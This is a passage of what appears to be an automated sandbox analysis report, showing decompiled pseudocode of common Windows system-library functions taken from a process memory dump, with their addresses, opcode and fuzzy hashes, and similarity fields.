				_v8 =  *0x100d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00F5B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00F2E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xef1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E00F41DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00F53C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00F28999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x00f28a0a
0x00f28a1c
0x00f28a23
0x00f28a2e
0x00f28a30
0x00f28a36
0x00f28a3c
0x00f28a3e
0x00f28a4a
0x00f28a52
0x00f28a9c
0x00f28aae
0x00f28a58
0x00f28a5e
0x00f28a6a
0x00f28a6f
0x00f28a75
0x00f28a7d
0x00f28a85
0x00f28a86
0x00f28a89
0x00f28a93
0x00f28a99
0x00f28a9b
0x00000000
0x00f28aaf
0x00f28abe
0x00f28ac3
0x00f28acb
0x00f28ad7
0x00f28ae0
0x00f28af1
0x00000000
0x00f28af1
0x00f28acd
0x00f28ad5
0x00f28afb
0x00f28afd
0x00f28aff
0x00f28b07
0x00f28b22
0x00f28b24
0x00f28b2a
0x00f28b2e
0x00f28b3f
0x00f28b78
0x00f28b41
0x00f28b52
0x00f28b54
0x00f28b5c
0x00f28b74
0x00f28b74
0x00f28b5c
0x00f28b3f
0x00f28b5e
0x00f28b61
0x00f28b64
0x00f28b64
0x00f28b6c
0x00f28b6c
0x00f28b11
0x00f79cd5
0x00f79cd5
0x00f28b17
0x00f28b1a
0x00f28b1a
0x00000000
0x00f28ad5
0x00f28a89

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
Instruction ID: e9dfb4a1c9b447accd59b412055e17c8be5a365a6faca50a011f291d3d8711a6
Opcode Fuzzy Hash: 20c8348ca3fbe10195aa67eb724819ab82b95b439a4077f41f23417ae17c302e
Instruction Fuzzy Hash: FC418FB1A0123C9BDB24CF55DC88BA9B7F4FB94350F1041EAE80997242EB749E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FDFDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FDFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E00FDFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E00FE0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E00F37D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E00FD1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E00FE2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E00FDC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E00FDDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E00F37D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E00FDA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x00fdfde7
0x00fdfde8
0x00fdfdec
0x00fdfdee
0x00fdfdf5
0x00fdfdf7
0x00fdfdfc
0x00fdfe19
0x00fdfe22
0x00fdfe26
0x00fdfec6
0x00fdfecd
0x00fdfed5
0x00fdfee7
0x00fdfed7
0x00fdfee0
0x00fdfee0
0x00fdfeef
0x00fdff00
0x00fdff02
0x00fdff07
0x00fdff07
0x00000000
0x00fdfeef
0x00fdfe33
0x00fdfe55
0x00fdfe59
0x00fdfe5b
0x00fdfe5e
0x00fdfe69
0x00fdfe6d
0x00fdfe6d
0x00fdfe69
0x00fdfe35
0x00fdfe41
0x00fdfe41
0x00fdfe79
0x00fdfe8b
0x00fdfe7b
0x00fdfe84
0x00fdfe84
0x00fdfe93
0x00000000
0x00fdfea8
0x00fdfeba
0x00000000
0x00fdfeba
0x00fdfdfe
0x00fdfe01
0x00fdfe02
0x00fdfe08
0x00fdff0c
0x00fdff14
0x00fdff14

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: c74d26e0c9983694543b2e08ab53e4edf37bffbb0e83a1311baae7b7ba119feb
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 943105326006446FD3229768CC45F6A77ABEBC5760F1C416AF8478B392DA74DC45F710

Uniqueness

Uniqueness Score: -1.00%

Function 00FDEA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FDEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				void* _v15;
				char _v16;
				void* _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00F32280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E00FDE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00F1F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E00F2FFB0(_t50, _t86, _t50);
					}
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E00FDAFDE( &_v12,  &_v16, 0x8000,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E00FDBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E00F37D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v16;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E00FCFE3F(_t55, _t91, _v12, _t55);
					}
				} else {
					if(_t86 == 0) {
						E00F2FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E00FDA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x00fdea55
0x00fdea66
0x00fdea68
0x00fdea6c
0x00fdea6f
0x00fdea72
0x00fdea75
0x00fdea7a
0x00fdea7a
0x00fdea7e
0x00fdea80
0x00fdea85
0x00fdea8b
0x00fdeab5
0x00fdeabc
0x00fdeabf
0x00fdeabf
0x00fdead0
0x00fdeae4
0x00fdeaf0
0x00fdeaf5
0x00fdeb09
0x00fdeb0d
0x00fdeb1d
0x00fdeb2d
0x00fdeb38
0x00fdeb3d
0x00fdeb41
0x00fdeb4a
0x00fdeb60
0x00fdeb4c
0x00fdeb52
0x00fdeb59
0x00fdeb59
0x00fdeb68
0x00fdeb71
0x00fdeb71
0x00fdea8d
0x00fdea8f
0x00fdea92
0x00fdea97
0x00fdea97
0x00fdea9b
0x00fdea9c
0x00fdea9e
0x00fdeaa6
0x00fdeaa6
0x00fdeb7e

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 2234023348986fa2413492c55c63656111688036122daff3f259a6f0900a2596
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: B431B4726047059BC719EF24CC81A5BB7AAFFC4320F08492EF5568B741DE38E819D795

Uniqueness

Uniqueness Score: -1.00%

Function 00F969A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00F969A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x100d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00F26C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00F96BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00F59980() >= 0) {
							E00F32280(_t56, 0x1008778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1008774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1008774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00F1B6F0(0xefc338, 0xefc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00F59520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00F595D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00F2FFB0(_t68, _t77, 0x1008778);
				}
				_pop(_t78);
				return E00F5B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x00f969b5
0x00f969be
0x00f969c3
0x00f969c9
0x00f969cc
0x00f969d1
0x00f969d3
0x00f969de
0x00f969e1
0x00f969ea
0x00f969f6
0x00f969fe
0x00f96a13
0x00f96a14
0x00f96a15
0x00f96a16
0x00f96a1e
0x00f96a26
0x00f96a31
0x00f96a36
0x00f96a37
0x00f96a40
0x00f96a49
0x00f96a4a
0x00f96a53
0x00f96a59
0x00f96a5d
0x00f96a5e
0x00f96a64
0x00f96a67
0x00f96a6a
0x00f96a6d
0x00f96a70
0x00f96a77
0x00f96a7d
0x00f96a86
0x00f96a89
0x00f96a9c
0x00f96a9f
0x00f96aa2
0x00f96aa5
0x00f96aaf
0x00f96ab1
0x00f96ab8
0x00f96ab9
0x00f96abb
0x00f96abe
0x00f96ac5
0x00f96ac5
0x00f96aaf
0x00f96a40
0x00f96a26
0x00f969fe
0x00f96ace
0x00f96ad0
0x00f96ad3
0x00f96ad8
0x00f96adf
0x00f96adf
0x00f96ae8
0x00f96aef
0x00f96aef
0x00f96af9
0x00f96b06

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
Instruction ID: e89f246d6051937002fae598fd246827c85f380c49f9a611ddcb2cd10e73d691
Opcode Fuzzy Hash: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
Instruction Fuzzy Hash: FD4188B1D00208AFEB25DFA5D941BAEBBF4FF48714F14812AE914A7241DB789905DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F15210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F15210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00F152A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00F595D0();
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00F2EB70(_t54, 0x10079a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00F595D0();
								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00F2EB70(_t54, 0x10079a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00F5F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00F2EB70(_t54, 0x10079a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00F595D0();
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x00f15220
0x00f15224
0x00f70d13
0x00f70d16
0x00f70d19
0x00f1522a
0x00f1522a
0x00f1522d
0x00f1522d
0x00f15231
0x00f15235
0x00f15239
0x00f70d5c
0x00f70d62
0x00000000
0x00000000
0x00f70d6a
0x00f70d7b
0x00f70d7f
0x00f70d81
0x00f70d84
0x00f70d95
0x00f70d95
0x00f70d6c
0x00f70d71
0x00f70d71
0x00f70d9a
0x00000000
0x00f1524a
0x00f1524a
0x00f15250
0x00f70d24
0x00f70d35
0x00f70d39
0x00f70d3b
0x00f70d3e
0x00f70d50
0x00f70d50
0x00f70d26
0x00f70d2b
0x00f70d2b
0x00000000
0x00f70d55
0x00f15256
0x00f1525b
0x00f15265
0x00f70da7
0x00f1526b
0x00f1526e
0x00f15272
0x00f70db1
0x00f70db4
0x00f70dc5
0x00f70dc5
0x00f15272
0x00f15278
0x00f1527e
0x00f1528a
0x00f1528c
0x00f1528d
0x00000000
0x00f15280
0x00f15282
0x00f15288
0x00f1529f
0x00f15292
0x00000000
0x00f15292
0x00000000
0x00f15288
0x00f1527e

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d38e5c760110dc3d6594c83eed6370e780a1659f613014872f9dc9d73163c70
Instruction ID: 546513bb4facdfb86460ecc19e9b685200177f9d11682b1725a5704eec920bee
Opcode Fuzzy Hash: 4d38e5c760110dc3d6594c83eed6370e780a1659f613014872f9dc9d73163c70
Instruction Fuzzy Hash: ED31F332641B50EBC736AB58CC41B6677A5EF50B30F20861AF8590B1A1EF74ED40E692

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F4A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0xff0220);
				E00F6D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1007b9c; // 0x0
				_t55 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E00F6D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1007b10 =  *0x1007b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x100536c; // 0x77ad5368
					if( *_t51 != 0x1005368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1005368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x100536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00F4A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x00f4a61c
0x00f4a61e
0x00f4a623
0x00f4a628
0x00f4a62b
0x00f4a62d
0x00f4a648
0x00f4a64a
0x00f4a64f
0x00f89b44
0x00f4a6ec
0x00f4a6f1
0x00f4a6f1
0x00f4a655
0x00f4a657
0x00f4a65a
0x00f4a65d
0x00f4a662
0x00f4a663
0x00f4a667
0x00f4a668
0x00f4a66d
0x00f4a706
0x00f4a706
0x00f89bda
0x00f89be6
0x00f89beb
0x00000000
0x00f89beb
0x00f4a679
0x00f89b7a
0x00000000
0x00f89b7a
0x00f4a683
0x00f4a6f4
0x00f4a6f7
0x00f4a6f9
0x00f4a6fd
0x00f4a6a0
0x00f4a6a0
0x00f4a6ad
0x00f4a6af
0x00f4a6b4
0x00f89ba7
0x00f89bac
0x00000000
0x00000000
0x00f89bc6
0x00f89bce
0x00f89bd1
0x00f89bd3
0x00f89bd3
0x00000000
0x00f89bd1
0x00f4a6bd
0x00f4a6c3
0x00f4a6c6
0x00f4a6d2
0x00f4a701
0x00f4a704
0x00000000
0x00f4a704
0x00f4a6d4
0x00f4a6d6
0x00f4a6d9
0x00f4a6db
0x00f4a6e1
0x00f4a6e6
0x00f4a6e8
0x00f4a6e8
0x00f4a6ea
0x00000000
0x00f4a6ea
0x00f4a688
0x00f4a692
0x00f4a694
0x00f4a699
0x00000000
0x00000000
0x00f4a69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d451b79d87ed70ae8db3b377b724cf3903e226201c700cf12455099b871c5e
Instruction ID: 4102a3edc35e5e3cb83b32df0c5b966eb3fc0230dabce2cf0ac9aa2e5ac54558
Opcode Fuzzy Hash: 15d451b79d87ed70ae8db3b377b724cf3903e226201c700cf12455099b871c5e
Instruction Fuzzy Hash: EF4168B5A44209DFCB15DF58D890BA9BBF1BB89310F1980A9E904AB385C779AD01EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F97016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F97016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x100d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E00F96B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E00F96B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00F37D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00F59AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00F5B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00F34620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x00f97016
0x00f9701e
0x00f9702b
0x00f97033
0x00f97037
0x00f9703c
0x00f9703e
0x00f97041
0x00f97045
0x00f9704a
0x00f97050
0x00f97055
0x00f9705a
0x00f97062
0x00f97062
0x00f9705a
0x00f97064
0x00f97064
0x00f97067
0x00f97071
0x00f97096
0x00f9709b
0x00f970a2
0x00f970a6
0x00f970a7
0x00f970ad
0x00f970b3
0x00f970b6
0x00f970bb
0x00f970c3
0x00f970c3
0x00f970c6
0x00f970cd
0x00f970dd
0x00f970e0
0x00f970e2
0x00f970e2
0x00f970ee
0x00f97101
0x00f970f0
0x00f970f9
0x00f970f9
0x00f9710a
0x00f9710e
0x00f97112
0x00f97117
0x00f97118
0x00f97118
0x00f970bb
0x00f9711d
0x00f97123
0x00f97131
0x00f97131
0x00f97136
0x00f9713d
0x00f9713e
0x00f9713f
0x00f9714a
0x00f9714a
0x00f97084
0x00f97088
0x00000000
0x00f9708e
0x00f9708e
0x00f97092
0x00000000
0x00f97092

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
Instruction ID: 32ec2d8882ab7a87af8b5101395741a8f8e0409f7d23449d79b54841ac838102
Opcode Fuzzy Hash: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
Instruction Fuzzy Hash: 6A31E472A087419BD724EF28CC41A6BB3E5BFC8710F044A29F89587691E734ED04DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F3C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F3C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
